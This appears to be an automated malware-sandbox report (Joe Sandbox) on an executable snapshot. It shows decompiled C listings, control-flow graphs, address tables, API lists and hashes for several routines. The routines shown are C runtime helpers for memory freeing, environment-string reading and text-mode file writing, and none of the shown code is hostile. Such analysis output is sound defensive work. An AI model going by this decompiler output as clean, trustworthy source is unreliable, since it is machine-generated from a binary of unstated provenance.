                                                control_flow_graph 304 c1db58-c1db6e call c1dcb7 306 c1db73-c1db79 304->306 307 c1db7b-c1dbaa call c23663 call c25f13 306->307 308 c1dbbe 306->308 314 c1dbc5-c1dbd6 call c22fd9 307->314 315 c1dbac-c1dbaf 307->315 310 c1dbc0-c1dbc4 308->310 314->308 322 c1dbd8-c1dbf2 call c25f13 314->322 316 c1dbb5-c1dbb8 315->316 317 c1dcac-c1dcb6 call c1d97b 315->317 316->308 316->317 325 c1dbf4-c1dbf7 322->325 326 c1dc0f-c1dc21 322->326 327 c1dcaa 325->327 328 c1dbfd-c1dc00 325->328 329 c1dc23-c1dc29 326->329 330 c1dc49-c1dc57 326->330 327->317 328->327 331 c1dc06-c1dc0d call c22f9f 328->331 329->330 332 c1dc2b-c1dc46 call c22f9f 329->332 333 c1dc89-c1dca5 330->333 334 c1dc59-c1dc65 330->334 331->308 332->330 333->310 334->333 337 c1dc67-c1dc6c 334->337 337->333 340 c1dc6e-c1dc84 call c22f9f 337->340 340->333
                                                C-Code - Quality: 76%
                                                			E00C1DB58(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                				intOrPtr _v0;
                                                				char _v8;
                                                				char _v12;
                                                				signed int _v16;
                                                				char _v20;
                                                				signed int _v44;
                                                				char _v80;
                                                				char _v84;
                                                				void* _v93;
                                                				char _v100;
                                                				char _v104;
                                                				char* _v108;
                                                				char _v112;
                                                				void* __ebp;
                                                				intOrPtr* _t70;
                                                				signed int _t71;
                                                				char _t72;
                                                				void* _t75;
                                                				signed int _t80;
                                                				signed int _t84;
                                                				signed int _t95;
                                                				signed int _t106;
                                                				signed int _t110;
                                                				char _t116;
                                                				void* _t120;
                                                				void* _t121;
                                                				signed int _t125;
                                                				signed int _t126;
                                                				void* _t129;
                                                				signed int _t131;
                                                				signed int _t133;
                                                				signed int _t143;
                                                				void* _t145;
                                                				char _t155;
                                                				intOrPtr* _t157;
                                                				intOrPtr _t159;
                                                				void* _t160;
                                                				signed int _t163;
                                                				void* _t167;
                                                				void* _t169;
                                                				void* _t170;
                                                				void* _t171;
                                                
                                                				_t153 = __edx;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_t163 = __ecx;
                                                				_push(__edi);
                                                				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
                                                				_t70 =  *((intOrPtr*)(__ecx));
                                                				_push( *_t70); // executed
                                                				L21(); // executed
                                                				_t157 = _t70;
                                                				_pop(_t129);
                                                				if(_t157 == 0) {
                                                					L4:
                                                					_t71 = 0;
                                                					goto L5;
                                                				} else {
                                                					_t72 = E00C23663(_t129, __edx);
                                                					_v12 = _t72;
                                                					_t125 = 0;
                                                					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
                                                					_t131 =  *(_t72 + 0x48);
                                                					_v16 = _t131;
                                                					_v8 = 0;
                                                					_t75 = E00C25F13(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
                                                					_t170 = _t169 + 0x18;
                                                					if(_t75 == 0) {
                                                						_t126 = E00C22FD9(_v8 + 4);
                                                						__eflags = _t126;
                                                						if(_t126 == 0) {
                                                							goto L4;
                                                						} else {
                                                							_t131 =  &_v20;
                                                							_t13 = _t126 + 4; // 0x4
                                                							_t80 = E00C25F13(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
                                                							_t170 = _t170 + 0x18;
                                                							__eflags = _t80;
                                                							if(_t80 == 0) {
                                                								_t133 = _t131 | 0xffffffff;
                                                								_t159 = _v20;
                                                								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x5191e8
                                                								__eflags =  *(_t159 + _t16 + 0x24);
                                                								if(__eflags != 0) {
                                                									asm("lock xadd [edx], eax");
                                                									if(__eflags == 0) {
                                                										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x5191e8
                                                										E00C22F9F( *((intOrPtr*)(_t159 + _t19 + 0x24)));
                                                										_pop(_t143);
                                                										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
                                                										_t133 = _t143 | 0xffffffff;
                                                										__eflags = _t133;
                                                									}
                                                								}
                                                								_t155 = _v12;
                                                								_t84 =  *0xc4229c; // 0xfffffffe
                                                								__eflags =  *(_t155 + 0x350) & _t84;
                                                								if(( *(_t155 + 0x350) & _t84) == 0) {
                                                									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x5191e8
                                                									__eflags =  *(_t159 + _t32 + 0x24);
                                                									if( *(_t159 + _t32 + 0x24) != 0) {
                                                										asm("lock xadd [eax], ecx");
                                                										__eflags = _t133 == 1;
                                                										if(_t133 == 1) {
                                                											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x5191e8
                                                											E00C22F9F( *((intOrPtr*)(_t159 + _t35 + 0x24)));
                                                											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
                                                											_t37 = _t159 + 0x24 + _t95 * 8;
                                                											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
                                                											__eflags =  *_t37;
                                                										}
                                                									}
                                                								}
                                                								_t43 = _t159 + 0xc; // 0xb80775c0
                                                								_t44 = _t126 + 4; // 0x4
                                                								_t71 = _t44;
                                                								 *_t126 =  *_t43;
                                                								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
                                                								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
                                                								L5:
                                                								return _t71;
                                                							} else {
                                                								__eflags = _t80 - 0x16;
                                                								if(_t80 == 0x16) {
                                                									L19:
                                                									_t125 = 0;
                                                									__eflags = 0;
                                                									goto L20;
                                                								} else {
                                                									__eflags = _t80 - 0x22;
                                                									if(_t80 == 0x22) {
                                                										goto L19;
                                                									} else {
                                                										E00C22F9F(_t126);
                                                										goto L4;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						if(_t75 == 0x16 || _t75 == 0x22) {
                                                							L20:
                                                							_push(_t125);
                                                							_push(_t125);
                                                							_push(_t125);
                                                							_push(_t125);
                                                							_push(_t125);
                                                							E00C1D97B();
                                                							asm("int3");
                                                							_t167 = _t170;
                                                							_push(_t131);
                                                							__eflags = _v44;
                                                							if(_v44 != 0) {
                                                								_push(_t163);
                                                								_push(_t157);
                                                								_t160 = 0;
                                                								_t106 = E00C25C54( &_v12, 0, 0, _a4, 0x7fffffff);
                                                								_t171 = _t170 + 0x14;
                                                								__eflags = _t106;
                                                								if(_t106 == 0) {
                                                									L26:
                                                									_t163 = E00C22F42(_v12, 2);
                                                									_pop(_t145);
                                                									__eflags = _t163;
                                                									if(_t163 == 0) {
                                                										L32:
                                                										E00C22F9F(_t163);
                                                										return _t160;
                                                									} else {
                                                										_t110 = E00C25C54(_t160, _t163, _v12, _a4, 0xffffffff);
                                                										_t171 = _t171 + 0x14;
                                                										__eflags = _t110;
                                                										if(_t110 == 0) {
                                                											_t160 = E00C21BDA(_t125, _t145, _t153, _t160, _t163, _v0, _t163);
                                                											goto L32;
                                                										} else {
                                                											__eflags = _t110 - 0x16;
                                                											if(_t110 == 0x16) {
                                                												goto L33;
                                                											} else {
                                                												__eflags = _t110 - 0x22;
                                                												if(_t110 == 0x22) {
                                                													goto L33;
                                                												} else {
                                                													goto L32;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = _t106 - 0x16;
                                                									if(_t106 == 0x16) {
                                                										L33:
                                                										_push(_t160);
                                                										_push(_t160);
                                                										_push(_t160);
                                                										_push(_t160);
                                                										_push(_t160);
                                                										E00C1D97B();
                                                										asm("int3");
                                                										_push(_t167);
                                                										E00C25939();
                                                										_v112 =  &_v84;
                                                										_v108 =  &_v80;
                                                										_t116 = 4;
                                                										_v100 = _t116;
                                                										_v104 = _t116;
                                                										_push( &_v100);
                                                										_push( &_v112);
                                                										_push( &_v104); // executed
                                                										_t120 = E00C1DAFD(_t125, _t160, _t163, __eflags); // executed
                                                										return _t120;
                                                									} else {
                                                										__eflags = _t106 - 0x22;
                                                										if(_t106 == 0x22) {
                                                											goto L33;
                                                										} else {
                                                											goto L26;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_t121 = E00C21BDA(_t125, _t131, _t153, _t157, _t163, _v0, 0); // executed
                                                								return _t121;
                                                							}
                                                						} else {
                                                							goto L4;
                                                						}
                                                					}
                                                				}
                                                			}













































                                                0x00c1db58
                                                0x00c1db60
                                                0x00c1db61
                                                0x00c1db62
                                                0x00c1db64
                                                0x00c1db68
                                                0x00c1db6a
                                                0x00c1db6c
                                                0x00c1db6e
                                                0x00c1db73
                                                0x00c1db76
                                                0x00c1db79
                                                0x00c1dbbe
                                                0x00c1dbbe
                                                0x00000000
                                                0x00c1db7b
                                                0x00c1db7b
                                                0x00c1db80
                                                0x00c1db83
                                                0x00c1db88
                                                0x00c1db8b
                                                0x00c1db98
                                                0x00c1db9d
                                                0x00c1dba0
                                                0x00c1dba5
                                                0x00c1dbaa
                                                0x00c1dbd1
                                                0x00c1dbd4
                                                0x00c1dbd6
                                                0x00000000
                                                0x00c1dbd8
                                                0x00c1dbd8
                                                0x00c1dbe2
                                                0x00c1dbe8
                                                0x00c1dbed
                                                0x00c1dbf0
                                                0x00c1dbf2
                                                0x00c1dc11
                                                0x00c1dc14
                                                0x00c1dc1b
                                                0x00c1dc1f
                                                0x00c1dc21
                                                0x00c1dc25
                                                0x00c1dc29
                                                0x00c1dc31
                                                0x00c1dc35
                                                0x00c1dc3c
                                                0x00c1dc41
                                                0x00c1dc46
                                                0x00c1dc46
                                                0x00c1dc46
                                                0x00c1dc29
                                                0x00c1dc49
                                                0x00c1dc4c
                                                0x00c1dc51
                                                0x00c1dc57
                                                0x00c1dc5f
                                                0x00c1dc63
                                                0x00c1dc65
                                                0x00c1dc67
                                                0x00c1dc6b
                                                0x00c1dc6c
                                                0x00c1dc74
                                                0x00c1dc78
                                                0x00c1dc82
                                                0x00c1dc84
                                                0x00c1dc84
                                                0x00c1dc84
                                                0x00c1dc84
                                                0x00c1dc6c
                                                0x00c1dc65
                                                0x00c1dc89
                                                0x00c1dc8c
                                                0x00c1dc8c
                                                0x00c1dc8f
                                                0x00c1dc97
                                                0x00c1dca1
                                                0x00c1dbc0
                                                0x00c1dbc4
                                                0x00c1dbf4
                                                0x00c1dbf4
                                                0x00c1dbf7
                                                0x00c1dcaa
                                                0x00c1dcaa
                                                0x00c1dcaa
                                                0x00000000
                                                0x00c1dbfd
                                                0x00c1dbfd
                                                0x00c1dc00
                                                0x00000000
                                                0x00c1dc06
                                                0x00c1dc07
                                                0x00000000
                                                0x00c1dc0c
                                                0x00c1dc00
                                                0x00c1dbf7
                                                0x00c1dbf2
                                                0x00c1dbac
                                                0x00c1dbaf
                                                0x00c1dcac
                                                0x00c1dcac
                                                0x00c1dcad
                                                0x00c1dcae
                                                0x00c1dcaf
                                                0x00c1dcb0
                                                0x00c1dcb1
                                                0x00c1dcb6
                                                0x00c1dcba
                                                0x00c1dcbc
                                                0x00c1dcbd
                                                0x00c1dcc1
                                                0x00c1dcd1
                                                0x00c1dcd2
                                                0x00c1dcdb
                                                0x00c1dce3
                                                0x00c1dce8
                                                0x00c1dceb
                                                0x00c1dced
                                                0x00c1dcf9
                                                0x00c1dd03
                                                0x00c1dd06
                                                0x00c1dd07
                                                0x00c1dd09
                                                0x00c1dd3a
                                                0x00c1dd3b
                                                0x00c1dd46
                                                0x00c1dd0b
                                                0x00c1dd15
                                                0x00c1dd1a
                                                0x00c1dd1d
                                                0x00c1dd1f
                                                0x00c1dd38
                                                0x00000000
                                                0x00c1dd21
                                                0x00c1dd21
                                                0x00c1dd24
                                                0x00000000
                                                0x00c1dd26
                                                0x00c1dd26
                                                0x00c1dd29
                                                0x00000000
                                                0x00c1dd2b
                                                0x00000000
                                                0x00c1dd2b
                                                0x00c1dd29
                                                0x00c1dd24
                                                0x00c1dd1f
                                                0x00c1dcef
                                                0x00c1dcef
                                                0x00c1dcf2
                                                0x00c1dd47
                                                0x00c1dd47
                                                0x00c1dd48
                                                0x00c1dd49
                                                0x00c1dd4a
                                                0x00c1dd4b
                                                0x00c1dd4c
                                                0x00c1dd51
                                                0x00c1dd54
                                                0x00c1dd5a
                                                0x00c1dd62
                                                0x00c1dd6d
                                                0x00c1dd70
                                                0x00c1dd71
                                                0x00c1dd74
                                                0x00c1dd7a
                                                0x00c1dd7e
                                                0x00c1dd82
                                                0x00c1dd83
                                                0x00c1dd89
                                                0x00c1dcf4
                                                0x00c1dcf4
                                                0x00c1dcf7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1dcf7
                                                0x00c1dcf2
                                                0x00c1dcc3
                                                0x00c1dcc8
                                                0x00c1dcd0
                                                0x00c1dcd0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1dbaf
                                                0x00c1dbaa

                                                APIs
                                                  • Part of subcall function 00C23663: GetLastError.KERNEL32(?,?,?,00C1BE2E,?,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23668
                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                • _free.LIBCMT ref: 00C1DC07
                                                • _free.LIBCMT ref: 00C1DC35
                                                • _free.LIBCMT ref: 00C1DC78
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast
                                                • String ID:
                                                • API String ID: 3291180501-0
                                                • Opcode ID: 9ac04d0f543036c38ee0a36b572e293003a6426e003ae6ef5f455f51dfdd8a8d
                                                • Instruction ID: a9b0e207d22909fb83b82e5815d82ced8fbf386b8b1a26a238dc92a4b0d3e60f
                                                • Opcode Fuzzy Hash: 9ac04d0f543036c38ee0a36b572e293003a6426e003ae6ef5f455f51dfdd8a8d
                                                • Instruction Fuzzy Hash: F7416C31600201AFD724DFADD981AA5B3F4FF4A3147240A6AF416C7391EB71ED50EB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 343 c1dcb7-c1dcc1 344 c1dcd1-c1dced call c25c54 343->344 345 c1dcc3-c1dcc8 call c21bda 343->345 350 c1dcf9-c1dd09 call c22f42 344->350 351 c1dcef-c1dcf2 344->351 348 c1dccd-c1dcd0 345->348 358 c1dd0b-c1dd1f call c25c54 350->358 359 c1dd3a-c1dd46 call c22f9f 350->359 352 c1dcf4-c1dcf7 351->352 353 c1dd47-c1dd83 call c1d97b call c25939 call c1dafd 351->353 352->350 352->353 372 c1dd88-c1dd89 353->372 367 c1dd21-c1dd24 358->367 368 c1dd2d-c1dd38 call c21bda 358->368 367->353 370 c1dd26-c1dd29 367->370 368->359 370->353 373 c1dd2b 370->373 373->359
                                                C-Code - Quality: 72%
                                                			E00C1DCB7(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				char _v28;
                                                				char _v32;
                                                				void* _v41;
                                                				char _v48;
                                                				char _v52;
                                                				char* _v56;
                                                				char _v60;
                                                				void* __ebp;
                                                				void* _t20;
                                                				void* _t24;
                                                				char _t30;
                                                				void* _t34;
                                                				void* _t35;
                                                				void* _t39;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t54;
                                                				void* _t55;
                                                
                                                				_t50 = __esi;
                                                				_t36 = __ebx;
                                                				_push(__ecx);
                                                				if(_a8 != 0) {
                                                					_push(__esi);
                                                					_push(__edi);
                                                					_t48 = 0;
                                                					_t20 = E00C25C54( &_v8, 0, 0, _a8, 0x7fffffff);
                                                					_t55 = _t54 + 0x14;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						L5:
                                                						_t50 = E00C22F42(_v8, 2);
                                                						_pop(_t39);
                                                						__eflags = _t50;
                                                						if(_t50 == 0) {
                                                							L11:
                                                							E00C22F9F(_t50);
                                                							return _t48;
                                                						} else {
                                                							_t24 = E00C25C54(_t48, _t50, _v8, _a8, 0xffffffff);
                                                							_t55 = _t55 + 0x14;
                                                							__eflags = _t24;
                                                							if(_t24 == 0) {
                                                								_t48 = E00C21BDA(_t36, _t39, _t46, _t48, _t50, _a4, _t50);
                                                								goto L11;
                                                							} else {
                                                								__eflags = _t24 - 0x16;
                                                								if(_t24 == 0x16) {
                                                									goto L12;
                                                								} else {
                                                									__eflags = _t24 - 0x22;
                                                									if(_t24 == 0x22) {
                                                										goto L12;
                                                									} else {
                                                										goto L11;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						__eflags = _t20 - 0x16;
                                                						if(_t20 == 0x16) {
                                                							L12:
                                                							_push(_t48);
                                                							_push(_t48);
                                                							_push(_t48);
                                                							_push(_t48);
                                                							_push(_t48);
                                                							E00C1D97B();
                                                							asm("int3");
                                                							E00C25939();
                                                							_v60 =  &_v32;
                                                							_v56 =  &_v28;
                                                							_t30 = 4;
                                                							_v48 = _t30;
                                                							_v52 = _t30;
                                                							_push( &_v48);
                                                							_push( &_v60);
                                                							_push( &_v52); // executed
                                                							_t34 = E00C1DAFD(_t36, _t48, _t50, __eflags); // executed
                                                							return _t34;
                                                						} else {
                                                							__eflags = _t20 - 0x22;
                                                							if(_t20 == 0x22) {
                                                								goto L12;
                                                							} else {
                                                								goto L5;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					_t35 = E00C21BDA(__ebx, __ecx, _t46, __edi, __esi, _a4, 0); // executed
                                                					return _t35;
                                                				}
                                                			}






















                                                0x00c1dcb7
                                                0x00c1dcb7
                                                0x00c1dcbc
                                                0x00c1dcc1
                                                0x00c1dcd1
                                                0x00c1dcd2
                                                0x00c1dcdb
                                                0x00c1dce3
                                                0x00c1dce8
                                                0x00c1dceb
                                                0x00c1dced
                                                0x00c1dcf9
                                                0x00c1dd03
                                                0x00c1dd06
                                                0x00c1dd07
                                                0x00c1dd09
                                                0x00c1dd3a
                                                0x00c1dd3b
                                                0x00c1dd46
                                                0x00c1dd0b
                                                0x00c1dd15
                                                0x00c1dd1a
                                                0x00c1dd1d
                                                0x00c1dd1f
                                                0x00c1dd38
                                                0x00000000
                                                0x00c1dd21
                                                0x00c1dd21
                                                0x00c1dd24
                                                0x00000000
                                                0x00c1dd26
                                                0x00c1dd26
                                                0x00c1dd29
                                                0x00000000
                                                0x00c1dd2b
                                                0x00000000
                                                0x00c1dd2b
                                                0x00c1dd29
                                                0x00c1dd24
                                                0x00c1dd1f
                                                0x00c1dcef
                                                0x00c1dcef
                                                0x00c1dcf2
                                                0x00c1dd47
                                                0x00c1dd47
                                                0x00c1dd48
                                                0x00c1dd49
                                                0x00c1dd4a
                                                0x00c1dd4b
                                                0x00c1dd4c
                                                0x00c1dd51
                                                0x00c1dd5a
                                                0x00c1dd62
                                                0x00c1dd6d
                                                0x00c1dd70
                                                0x00c1dd71
                                                0x00c1dd74
                                                0x00c1dd7a
                                                0x00c1dd7e
                                                0x00c1dd82
                                                0x00c1dd83
                                                0x00c1dd89
                                                0x00c1dcf4
                                                0x00c1dcf4
                                                0x00c1dcf7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1dcf7
                                                0x00c1dcf2
                                                0x00c1dcc3
                                                0x00c1dcc8
                                                0x00c1dcd0
                                                0x00c1dcd0

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __cftoe$_free
                                                • String ID:
                                                • API String ID: 1303422935-0
                                                • Opcode ID: 8933e55919e45e7770616375d55a8cb9b521d256095c4a5e19067e8683cad1a0
                                                • Instruction ID: 641004af5f333829fc50ef55a634a48763ab97e5753de0d9ec9838a025f84b1a
                                                • Opcode Fuzzy Hash: 8933e55919e45e7770616375d55a8cb9b521d256095c4a5e19067e8683cad1a0
                                                • Instruction Fuzzy Hash: 3E210D72804118BACF15AB95AC45EDF3BB8DF86320F214166F926E5581EF30C784F6A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 375 c2afce-c2afe3 GetEnvironmentStringsW 376 c2afe5-c2b006 call c2af97 call c29b81 375->376 377 c2b03e 375->377 376->377 385 c2b008-c2b009 call c22fd9 376->385 379 c2b040-c2b042 377->379 381 c2b044-c2b045 FreeEnvironmentStringsW 379->381 382 c2b04b-c2b051 379->382 381->382 387 c2b00e-c2b013 385->387 388 c2b033 387->388 389 c2b015-c2b02b call c29b81 387->389 391 c2b035-c2b03c call c22f9f 388->391 389->388 394 c2b02d-c2b031 389->394 391->379 394->391
                                                C-Code - Quality: 100%
                                                			E00C2AFCE(void* __ecx) {
                                                				intOrPtr _v8;
                                                				intOrPtr _t7;
                                                				void* _t8;
                                                				void* _t13;
                                                				void* _t24;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = GetEnvironmentStringsW();
                                                				if(_t26 == 0) {
                                                					L7:
                                                					_t13 = 0;
                                                				} else {
                                                					_t17 = E00C2AF97(_t26) - _t26 >> 1;
                                                					_t7 = E00C29B81(0, 0, _t26, E00C2AF97(_t26) - _t26 >> 1, 0, 0, 0, 0);
                                                					_v8 = _t7;
                                                					if(_t7 == 0) {
                                                						goto L7;
                                                					} else {
                                                						_t8 = E00C22FD9(_t7); // executed
                                                						_t24 = _t8;
                                                						if(_t24 == 0 || E00C29B81(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
                                                							_t13 = 0;
                                                						} else {
                                                							_t13 = _t24;
                                                							_t24 = 0;
                                                						}
                                                						E00C22F9F(_t24);
                                                					}
                                                				}
                                                				if(_t26 != 0) {
                                                					FreeEnvironmentStringsW(_t26);
                                                				}
                                                				return _t13;
                                                			}









                                                0x00c2afdd
                                                0x00c2afe3
                                                0x00c2b03e
                                                0x00c2b03e
                                                0x00c2afe5
                                                0x00c2aff3
                                                0x00c2aff9
                                                0x00c2b001
                                                0x00c2b006
                                                0x00000000
                                                0x00c2b008
                                                0x00c2b009
                                                0x00c2b00e
                                                0x00c2b013
                                                0x00c2b033
                                                0x00c2b02d
                                                0x00c2b02d
                                                0x00c2b02f
                                                0x00c2b02f
                                                0x00c2b036
                                                0x00c2b03b
                                                0x00c2b006
                                                0x00c2b042
                                                0x00c2b045
                                                0x00c2b045
                                                0x00c2b051

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 00C2AFD7
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C2B045
                                                  • Part of subcall function 00C29B81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00C282DA,?,00000000,00000000), ref: 00C29C2D
                                                  • Part of subcall function 00C22FD9: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C2AB63,00000220,?,?,?,?,?,?,00C1B9BE,?,?,?), ref: 00C2300B
                                                • _free.LIBCMT ref: 00C2B036
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                • String ID:
                                                • API String ID: 2560199156-0
                                                • Opcode ID: 048757dac51d512122ccded2d82e3b6a99e7efbb01bbc44c4659154538bbd85b
                                                • Instruction ID: 4438bacd0798aa0ea028b81bc004ca982317b38030fff8421647f9c74a22f5ea
                                                • Opcode Fuzzy Hash: 048757dac51d512122ccded2d82e3b6a99e7efbb01bbc44c4659154538bbd85b
                                                • Instruction Fuzzy Hash: CC01D4E2A016357B233212B63DCADBF6A6DCEC6BA03150128B920D2500EFA48D01A1B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 396 c27035-c2708a call c17f60 399 c270ff-c2710f call c17193 396->399 400 c2708c 396->400 402 c27092 400->402 404 c27098-c2709a 402->404 405 c270b4-c270d9 WriteFile 404->405 406 c2709c-c270a1 404->406 409 c270f7-c270fd GetLastError 405->409 410 c270db-c270e6 405->410 407 c270a3-c270a9 406->407 408 c270aa-c270b2 406->408 407->408 408->404 408->405 409->399 410->399 411 c270e8-c270f3 410->411 411->402 412 c270f5 411->412 412->399
                                                C-Code - Quality: 81%
                                                			E00C27035(void* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				char _v9;
                                                				void _v5128;
                                                				long _v5132;
                                                				intOrPtr _v5136;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t29;
                                                				int _t41;
                                                				long _t43;
                                                				char _t44;
                                                				void* _t46;
                                                				intOrPtr* _t50;
                                                				intOrPtr _t54;
                                                				void* _t55;
                                                				long _t56;
                                                				char* _t57;
                                                				signed int _t58;
                                                
                                                				E00C17F60(0x140c);
                                                				_t29 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t29 ^ _t58;
                                                				_t47 = _a8;
                                                				_t46 = _a4;
                                                				_t55 = _t46;
                                                				_t50 = _a12;
                                                				_t54 = _a16 + _t50;
                                                				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0xc99448 + (_a8 >> 6) * 4)) + 0x18 + (_t47 & 0x0000003f) * 0x38));
                                                				asm("stosd");
                                                				_v5136 = _t54;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				if(_t50 < _t54) {
                                                					_t55 = _v5132;
                                                					do {
                                                						_t57 =  &_v5128;
                                                						while(_t50 < _t54) {
                                                							_t44 =  *_t50;
                                                							_t50 = _t50 + 1;
                                                							if(_t44 == 0xa) {
                                                								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
                                                								 *_t57 = 0xd;
                                                								_t57 = _t57 + 1;
                                                							}
                                                							 *_t57 = _t44;
                                                							_t57 = _t57 + 1;
                                                							if(_t57 <  &_v9) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						_a12 = _t50;
                                                						_t56 = _t57 -  &_v5128;
                                                						_t41 = WriteFile(_t55,  &_v5128, _t56,  &_v5132, 0); // executed
                                                						if(_t41 == 0) {
                                                							 *_t46 = GetLastError();
                                                						} else {
                                                							_t43 = _v5132;
                                                							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t43;
                                                							if(_t43 >= _t56) {
                                                								goto L9;
                                                							}
                                                						}
                                                						goto L12;
                                                						L9:
                                                						_t50 = _a12;
                                                						_t54 = _v5136;
                                                					} while (_t50 < _t54);
                                                				}
                                                				L12:
                                                				return E00C17193(_t46, _t46, _v8 ^ _t58, _t54, _t55, _t56);
                                                			}


















